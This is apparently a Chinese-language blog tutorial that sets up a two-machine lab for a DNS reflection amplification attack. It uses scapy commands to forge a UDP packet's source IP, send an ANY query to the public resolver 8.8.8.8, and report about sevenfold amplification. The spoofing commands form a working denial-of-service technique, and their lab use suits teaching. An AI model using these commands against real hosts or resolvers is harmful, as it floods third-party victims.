DNS反射放大攻击

准备2台机器


172.28.6.132 发包伪造133机器源IP
172.28.6.133 收包

构造IP数据包

利用scapy 工具构造IP数据包
构造过程如下:


$ sudo scapy
$ >>> i=IP()
$ >>> i.src="172.28.6.133"
$ >>> i.dst="8.8.8.8"
$ >>> u=UDP()
$ >>> d=DNS()
$ >>> d.qdcount=1
$ >>> dr=DNSQR()
$ >>> dr.qname="baidu.com"
$ >>> dr.qtype=255
$ >>> d.qd=dr
$ >>> r=(i/u/d)
$ >>> r.display()
###[ IP ]###
 version  = 4
 ihl    = None
 tos    = 0x0
 len    = None
 id    = 1
 flags   =
 frag   = 0
 ttl    = 64
 proto   = udp
 chksum  = None
 src    = 172.28.6.133
 dst    = 8.8.8.8
 \options  \
###[ UDP ]###
   sport   = domain
   dport   = domain
   len    = None
   chksum  = None
###[ DNS ]###
    id    = 0
    qr    = 0
    opcode  = QUERY
    aa    = 0
    tc    = 0
    rd    = 1
    ra    = 0
    z     = 0
    ad    = 0
    cd    = 0
    rcode   = ok
    qdcount  = 1
    ancount  = 0
    nscount  = 0
    arcount  = 0
    \qd    \
     |###[ DNS Question Record ]###
     | qname   = 'baidu.com'
     | qtype   = ALL
     | qclass  = IN
    an    = None
    ns    = None
    ar    = None
$ >>> sr1(r) // 发包

抓包显示

 1. 发包机器

 1. 收包机器

总结

由上可以看到,udp可以轻易的实现篡改源IP的操作,从而可以利用一些应用和协议的问题进行放大操作,例如上面发包的69byte的包,最后打到目标机器有529byte,从而放大了7倍多。

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

19 + 1 =